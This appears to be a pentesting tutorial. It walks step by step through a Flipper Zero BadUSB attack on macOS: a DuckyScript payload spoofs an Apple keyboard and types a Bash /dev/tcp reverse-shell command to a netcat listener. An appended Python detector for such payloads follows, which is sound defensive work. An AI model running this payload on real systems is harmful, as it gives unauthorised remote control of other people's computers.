Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server, I was able to gain a shell on my fully patched, up-to-date macOS Ventura computer. In my lab environment I use the Flipper Zero as a pentesting device to test vulnerabilities in my servers and desktop systems. The Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu for selecting them, and uses a progress display to provide feedback.

This article is an example of how to use the Flipper Zero as an ethical pentesting BadUSB device and how to avoid becoming a victim of such an exploit. Do not use this on computers that you do not own or have permission to use. This code makes no effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, firewalls, or anti-virus (AV) software.

BadUSB Payloads

The Flipper Zero BadUSB, like several other BadUSB devices, uses payloads written in DuckyScript, a simple scripting language for performing keystrokes that results in a keyboard injection attack. A good starting reference point for DuckyScript payloads is the official Hak5 website: https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky. Here you will find examples and documentation for using DuckyScript.

Let’s Write Some DuckyScript

You can use a ready-made script, or you can learn to write your own. We’ll show you how to exploit a reverse shell on a macOS computer in a simple step-by-step walkthrough. Use your favorite text editor and enter the following text. macOS has the TextEdit application installed by default, so we’ll use that.
    ID 05ac:021e Apple:Keyboard
    DELAY 1000
    GUI SPACE
    DELAY 200
    STRING terminal
    DELAY 200
    ENTER
    DELAY 1000
    STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
    DELAY 1000
    ENTER
    DELAY 1000

For this walkthrough we don’t need to know a lot about DuckyScript, so we’ll go over only the few commands that our script uses. There are really only six different commands.

Command and description:

ID 05ac:021e Apple:Keyboard
    Tells macOS that our Flipper Zero is really an Apple keyboard. If you do not use this line, macOS displays the Keyboard Setup Assistant dialog, which will cause your script to fail.

DELAY
    Instructs the operating system to wait for a period of time. If we don’t use these delays, the script will run too fast and fail.

GUI SPACE
    Presses the Apple Command key and the Space bar to open the ‘Spotlight Search’ window.

STRING Terminal
    Enters the string ‘Terminal’ into the Spotlight Search window.

ENTER
    Presses the ENTER or Return key on your keyboard. After pressing ENTER, macOS launches the Terminal window (/Applications/Utilities/Terminal).

STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
    Enters this text into the terminal window, which establishes a connection to the Netcat server listening at 10.10.10.157 on port 4444.

Change the IP address 10.10.10.157 and port 4444 to your server’s IP address and port.

Save this file to your disk as rev_shell_macos.txt. There is no subdirectory organization under the badusb directory on the Flipper Zero, so if you are using multiple payloads for different operating systems, use a naming convention that means something to you so you know what each one does.

Installing the qflipper Application

If you haven’t installed the qflipper application yet, go to the official Flipper Zero update page and select the installer for your operating system. The page is the firmware update page, but at the bottom are links to install the qflipper application.
https://flipperzero.one/update

Follow the instructions for your operating system to install the qflipper application.

Getting the DuckyScript Onto the Flipper Zero

Open the qflipper application and select the folder icon highlighted in red. Select and double-click the SD Card icon to view the contents. Locate the rev_shell_macos.txt file we created earlier and drag it onto the badusb folder. Remove the Flipper Zero from your computer when the file is done copying.

Waiting for a Reverse Shell

The Flipper Zero BadUSB is armed and ready to use. But first, we need to set up our remote listener on our server. On our Ubuntu server, start the Netcat listener with the following command:

    $ nc -nlvp 4444

The breakdown of the command is listed in the following table. Again, you don’t really need to know what’s going on with this command, other than that it’s waiting for an incoming connection.

Command and description:

nc
    Netcat command

-nlvp
    (n) no DNS resolution, (l) listen for an incoming connection, (v) verbose output, (p) port

4444
    Port number to listen on

Now that our Netcat listener is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack.

Starting the BadUSB Reverse Shell

The hard part is done. The Flipper Zero BadUSB file rev_shell_macos.txt is written, moved to the Flipper Zero, and the Netcat listener is waiting for a connection.

Locate the Bad USB menu and select the Run button. Do not connect your Flipper Zero to your computer just yet. The Flipper Zero will let you know when it’s time to connect your device.

Navigate to the DuckyScript file we copied in the previous step. If you don’t see this file, then you copied it to the wrong directory or did not use the .txt filename extension. Select rev_shell_macos and click the Run button.

When you see the alert, you can connect your Flipper Zero to your iMac or MacBook’s USB port. Click the Run button.
Connect to USB

You can watch the progress of your BadUSB script in the main window. Once the status reaches 100% the payload is complete and you can remove the Flipper Zero. If you are watching the iMac’s monitor you can see the exploit as it executes the DuckyScript.

The Netcat listener on our Ubuntu server displays the results of the successful connection.

Control of your Computer

You now have control of the macOS computer through a reverse shell. Because macOS is built on a BSD Unix foundation, you can use Unix command line tools and a Bash shell as if you were sitting at the physical iMac’s keyboard. You can use regular Linux commands like whoami, pwd, ls, or cd to navigate the filesystem and manipulate the operating system.

Next Steps

Now that you have an understanding of how the Flipper Zero operates as a BadUSB device, you can create your own scripts. Use the Hak5 site or one of the many DuckyScript GitHub repositories available through a Google search as a starting point for your own DuckyScript files. Operate legally and ethically. Use this tool only on devices that you own or have permission to use.
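The article promises to show how to avoid becoming a victim of this kind of exploit, so here is the defender's side of the two passages above: the payload format explained under "Let's Write Some DuckyScript" and the session described under "Control of your Computer". This is an added example, not code from the article or from the Flipper Zero project. It parses a DuckyScript file (a copy of the article's 12-line payload, embedded as sample input), reports the spoofed USB device ID and any typed text that opens a socket through Bash's /dev/tcp pseudo-device, and then runs a simple correlation over constructed host telemetry: a shell launch whose argv opens a socket is flagged, and the severity is raised when a new HID keyboard was attached within the preceding minute, which is the tell-tale of a keystroke-injection device. The telemetry line format, the event sources, the timestamps and the process IDs are all constructed for this example and are not real macOS log output.

```python
"""Defender-side review of a BadUSB reverse-shell payload and the host telemetry
it produces. Added example, not code from the original article; every file and
log line below is constructed for illustration.
"""
import re
from datetime import datetime, timedelta

# Copy of the article's 12-line DuckyScript payload, embedded here as sample input.
SAMPLE_PAYLOAD = """\
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
"""

# Constructed host telemetry (hypothetical format, not real macOS log output):
# "timestamp | source | message", as an EDR agent or log forwarder might emit it.
SAMPLE_EVENTS = """\
2024-01-15T09:00:01 | usb  | HID keyboard attached vid=05ac pid=021e
2024-01-15T09:00:03 | proc | exec pid=4120 ppid=4101 image=/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
2024-01-15T09:00:05 | proc | exec pid=4133 ppid=4120 image=/bin/bash argv="bash -i >& /dev/tcp/10.10.10.157/4444 0>&1"
2024-01-15T10:30:00 | usb  | HID keyboard attached vid=05ac pid=024f
2024-01-15T10:45:10 | proc | exec pid=5001 ppid=4990 image=/bin/bash argv="bash -lc ls"
"""

# Bash's /dev/tcp and /dev/udp pseudo-devices open a socket from typed text alone,
# so their presence in a STRING line or a process argv is a strong indicator.
DEV_SOCKET = re.compile(r"/dev/(?:tcp|udp)/([\w.\-]+)/(\d{1,5})")


def review_payload(text: str) -> dict:
    """Parse a DuckyScript file and summarise what a defender should know about it."""
    report = {"commands": [], "total_delay_ms": 0, "spoofed_device": None,
              "egress": [], "findings": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):          # REM is DuckyScript's comment keyword
            continue
        keyword, _, arg = line.partition(" ")
        keyword = keyword.upper()
        report["commands"].append((keyword, arg))
        if keyword == "DELAY":                           # scripted pauses, in milliseconds
            report["total_delay_ms"] += int(arg)
        elif keyword == "ID":                            # VID:PID the device will present
            report["spoofed_device"] = arg.split()[0]
            report["findings"].append(f"impersonates USB device {arg}")
        elif keyword == "STRING":                        # text typed into the victim
            for host, port in DEV_SOCKET.findall(arg):
                report["egress"].append((host, int(port)))
                report["findings"].append(f"typed text opens a socket to {host}:{port}")
    return report


def parse_events(text: str) -> list:
    """Split the constructed 'timestamp | source | message' telemetry into dicts."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, source, msg = (p.strip() for p in line.split("|", 2))
            events.append({"ts": datetime.fromisoformat(ts), "source": source, "msg": msg})
    return events


def detect_badusb_reverse_shell(events: list, window: timedelta = timedelta(seconds=60)) -> list:
    """Flag process launches whose argv opens a socket; raise the severity when a
    HID keyboard was attached within `window` before the launch (the BadUSB tell)."""
    alerts = []
    for ev in events:
        m = DEV_SOCKET.search(ev["msg"]) if ev["source"] == "proc" else None
        if not m:
            continue
        pid = int(re.search(r"\bpid=(\d+)", ev["msg"]).group(1))   # \b skips "ppid="
        hid_before = any(e["source"] == "usb" and "HID keyboard attached" in e["msg"]
                         and timedelta(0) <= ev["ts"] - e["ts"] <= window for e in events)
        alerts.append({"pid": pid, "dst": f"{m.group(1)}:{m.group(2)}",
                       "hid_attach_before": hid_before,
                       "severity": "high" if hid_before else "medium"})
    return alerts


if __name__ == "__main__":
    for finding in review_payload(SAMPLE_PAYLOAD)["findings"]:
        print("payload:", finding)
    for alert in detect_badusb_reverse_shell(parse_events(SAMPLE_EVENTS)):
        print("alert:", alert)
```

The static review is what you would run over a payload folder before it ever reaches a Flipper Zero; the correlation is the shape of a host detection rule, and the later `bash -lc ls` launch shows that a keyboard attach on its own does not fire, only a socket-opening shell within the window does.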